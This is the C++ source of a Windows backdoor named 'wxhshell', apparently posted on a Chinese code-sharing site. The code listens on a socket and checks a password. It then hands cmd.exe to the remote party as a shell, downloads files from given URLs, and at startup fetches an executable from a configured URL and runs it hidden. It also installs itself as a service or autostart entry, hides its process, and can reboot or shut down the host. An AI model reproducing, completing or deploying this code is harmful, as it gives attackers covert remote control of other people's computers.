📄 realbackdoor.cpp
字号:
//send(wsh,wscfg.ws_passmsg,strlen(wscfg.ws_passmsg),0);
//ZeroMemory(pwd,KEY_BUFF);
i=0;
while(i<SVC_LEN) {
// 设置超时
fd_set FdRead;
struct timeval TimeOut;
FD_ZERO(&FdRead);
FD_SET(wsh,&FdRead);
TimeOut.tv_sec=8;
TimeOut.tv_usec=0;
int Er=select(wsh+1, &FdRead, NULL, NULL, &TimeOut);
if((Er==SOCKET_ERROR) || (Er==0)) CloseIt(wsh);
if(recv(wsh,chr,1,0)==SOCKET_ERROR) CloseIt(wsh);
pwd[i]=chr[0];
if(chr[0]==0xd || chr[0]==0xa) {
pwd[i]=0;
break;
}
i++;
}
// 如果是非法用户,关闭 socket
if(strcmp(pwd,wscfg.ws_passstr)) CloseIt(wsh);
}
send(wsh,msg_ws_copyright,strlen(msg_ws_copyright),0);
send(wsh,msg_ws_prompt,strlen(msg_ws_prompt),0);
while(1) {
ZeroMemory(cmd,KEY_BUFF);
// 自动支持客户端 telnet标准
j=0;
while(j<KEY_BUFF) {
if(recv(wsh,chr,1,0)==SOCKET_ERROR) CloseIt(wsh);
cmd[j]=chr[0];
if(chr[0]==0xa || chr[0]==0xd) {
cmd[j]=0;
break;
}
j++;
}
// 下载文件
if(strstr(cmd,"http://")) {
send(wsh,msg_ws_down,strlen(msg_ws_down),0);
if(DownloadFile(cmd,wsh))
send(wsh,msg_ws_err,strlen(msg_ws_err),0);
else
send(wsh,msg_ws_ok,strlen(msg_ws_ok),0);
}
else {
switch(cmd[0]) {
// 帮助
case '?': {
send(wsh,msg_ws_cmd,strlen(msg_ws_cmd),0);
break;
}
// 安装
case 'i': {
if(Install())
send(wsh,msg_ws_err,strlen(msg_ws_err),0);
else
send(wsh,msg_ws_ok,strlen(msg_ws_ok),0);
break;
}
// 卸载
case 'r': {
if(Uninstall())
send(wsh,msg_ws_err,strlen(msg_ws_err),0);
else
send(wsh,msg_ws_ok,strlen(msg_ws_ok),0);
break;
}
// 显示 wxhshell 所在路径
case 'p': {
char svExeFile[MAX_PATH];
strcpy(svExeFile,"\n\r");
strcat(svExeFile,ExeFile);
send(wsh,svExeFile,strlen(svExeFile),0);
break;
}
// 重启
case 'b': {
send(wsh,msg_ws_boot,strlen(msg_ws_boot),0);
if(Boot(REBOOT))
send(wsh,msg_ws_err,strlen(msg_ws_err),0);
else {
closesocket(wsh);
ExitThread(0);
}
break;
}
// 关机
case 'd': {
send(wsh,msg_ws_poff,strlen(msg_ws_poff),0);
if(Boot(SHUTDOWN))
send(wsh,msg_ws_err,strlen(msg_ws_err),0);
else {
closesocket(wsh);
ExitThread(0);
}
break;
}
// 获取shell
case 's': {
CmdShell(wsh);
closesocket(wsh);
ExitThread(0);
break;
}
// 退出
case 'x': {
send(wsh,msg_ws_ext,strlen(msg_ws_ext),0);
CloseIt(wsh);
break;
}
// 离开
case 'q': {
send(wsh,msg_ws_end,strlen(msg_ws_end),0);
closesocket(wsh);
WSACleanup();
exit(1);
break;
}
}
}
// 提示信息
if(strlen(cmd)) send(wsh,msg_ws_prompt,strlen(msg_ws_prompt),0);
}
}
return;
}
// shell模块句柄
int CmdShell(SOCKET sock)
{
STARTUPINFO si;
ZeroMemory(&si,sizeof(si));
si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.hStdInput=si.hStdOutput =si.hStdError =(void *)sock;
PROCESS_INFORMATION ProcessInfo;
char cmdline[]="cmd";
CreateProcess(NULL,cmdline,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInfo);
return 0;
}
// 自身启动模式
int StartFromService(void)
{
typedef struct
{
DWORD ExitStatus;
DWORD PebBaseAddress;
DWORD AffinityMask;
DWORD BasePriority;
ULONG UniqueProcessId;
ULONG InheritedFromUniqueProcessId;
} PROCESS_BASIC_INFORMATION;
PROCNTQSIP NtQueryInformationProcess;
static ENUMPROCESSMODULES g_pEnumProcessModules = NULL ;
static GETMODULEBASENAME g_pGetModuleBaseName = NULL ;
HANDLE hProcess;
PROCESS_BASIC_INFORMATION pbi;
HINSTANCE hInst = LoadLibraryA("PSAPI.DLL");
if(NULL == hInst ) return 0;
g_pEnumProcessModules = (ENUMPROCESSMODULES)GetProcAddress(hInst ,"EnumProcessModules");
g_pGetModuleBaseName = (GETMODULEBASENAME)GetProcAddress(hInst, "GetModuleBaseNameA");
NtQueryInformationProcess = (PROCNTQSIP)GetProcAddress(GetModuleHandle("ntdll"), "NtQueryInformationProcess");
if (!NtQueryInformationProcess) return 0;
hProcess = OpenProcess(PROCESS_QUERY_INFORMATION,FALSE,GetCurrentProcessId());
if(!hProcess) return 0;
if(NtQueryInformationProcess( hProcess, 0, (PVOID)&pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL)) return 0;
CloseHandle(hProcess);
hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pbi.InheritedFromUniqueProcessId);
if(hProcess==NULL) return 0;
HMODULE hMod;
char procName[255];
unsigned long cbNeeded;
if(g_pEnumProcessModules(hProcess, &hMod, sizeof(hMod), &cbNeeded)) g_pGetModuleBaseName(hProcess, hMod, procName, sizeof(procName));
CloseHandle(hProcess);
if(strstr(procName,"services")) return 1; // 以服务启动
return 0; // 注册表启动
}
// 主模块
int StartWxhshell(LPSTR lpCmdLine)
{
SOCKET wsl;
BOOL val=TRUE;
int port=0;
struct sockaddr_in door;
if(wscfg.ws_autoins) Install();
port=atoi(lpCmdLine);
if(port<=0) port=wscfg.ws_port;
WSADATA data;
if(WSAStartup(MAKEWORD(2,2),&data)!=0) return 1;
if((wsl = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP,NULL,0,0)) == INVALID_SOCKET) return 1;
setsockopt(wsl,SOL_SOCKET,SO_REUSEADDR,(char *)&val,sizeof(val));
door.sin_family = AF_INET;
door.sin_addr.s_addr = inet_addr("127.0.0.1");
door.sin_port = htons(port);
if(bind(wsl, (const struct sockaddr *) &door,sizeof(door)) == INVALID_SOCKET) {
closesocket(wsl);
return 1;
}
if(listen(wsl,2) == INVALID_SOCKET) {
closesocket(wsl);
return 1;
}
Wxhshell(wsl);
WSACleanup();
return 0;
}
// 以NT服务方式启动
VOID WINAPI NTServiceMain( DWORD dwArgc, LPSTR *lpszArgv )
{
DWORD status = 0;
DWORD specificError = 0xfffffff;
serviceStatus.dwServiceType = SERVICE_WIN32;
serviceStatus.dwCurrentState = SERVICE_START_PENDING;
serviceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE;
serviceStatus.dwWin32ExitCode = 0;
serviceStatus.dwServiceSpecificExitCode = 0;
serviceStatus.dwCheckPoint = 0;
serviceStatus.dwWaitHint = 0;
hServiceStatusHandle = RegisterServiceCtrlHandler(wscfg.ws_svcname, NTServiceHandler);
if (hServiceStatusHandle==0) return;
status = GetLastError();
if (status!=NO_ERROR)
{
serviceStatus.dwCurrentState = SERVICE_STOPPED;
serviceStatus.dwCheckPoint = 0;
serviceStatus.dwWaitHint = 0;
serviceStatus.dwWin32ExitCode = status;
serviceStatus.dwServiceSpecificExitCode = specificError;
SetServiceStatus(hServiceStatusHandle, &serviceStatus);
return;
}
serviceStatus.dwCurrentState = SERVICE_RUNNING;
serviceStatus.dwCheckPoint = 0;
serviceStatus.dwWaitHint = 0;
if(SetServiceStatus(hServiceStatusHandle, &serviceStatus)) StartWxhshell("");
}
// 处理NT服务事件,比如:启动、停止
VOID WINAPI NTServiceHandler(DWORD fdwControl)
{
switch(fdwControl)
{
case SERVICE_CONTROL_STOP:
serviceStatus.dwWin32ExitCode = 0;
serviceStatus.dwCurrentState = SERVICE_STOPPED;
serviceStatus.dwCheckPoint = 0;
serviceStatus.dwWaitHint = 0;
{
SetServiceStatus(hServiceStatusHandle, &serviceStatus);
}
return;
case SERVICE_CONTROL_PAUSE:
serviceStatus.dwCurrentState = SERVICE_PAUSED;
break;
case SERVICE_CONTROL_CONTINUE:
serviceStatus.dwCurrentState = SERVICE_RUNNING;
break;
case SERVICE_CONTROL_INTERROGATE:
break;
};
SetServiceStatus(hServiceStatusHandle, &serviceStatus);
}
// 标准应用程序主函数
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, INT nCmdShow)
{
// 获取操作系统版本
OsIsNt=GetOsVer();
GetModuleFileName(NULL,ExeFile,MAX_PATH);
// 从命令行安装
if(strpbrk(lpCmdLine,"iI")) Install();
// 下载执行文件
if(wscfg.ws_downexe) {
if(URLDownloadToFile(0, wscfg.ws_fileurl, wscfg.ws_filenam, 0, 0)==S_OK)
WinExec(wscfg.ws_filenam,SW_HIDE);
}
if(!OsIsNt) {
// 如果时win9x,隐藏进程并且设置为注册表启动
HideProc();
StartWxhshell(lpCmdLine);
}
else
if(StartFromService())
// 以服务方式启动
StartServiceCtrlDispatcher(DispatchTable);
else
// 普通方式启动
StartWxhshell(lpCmdLine);
return 0;
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -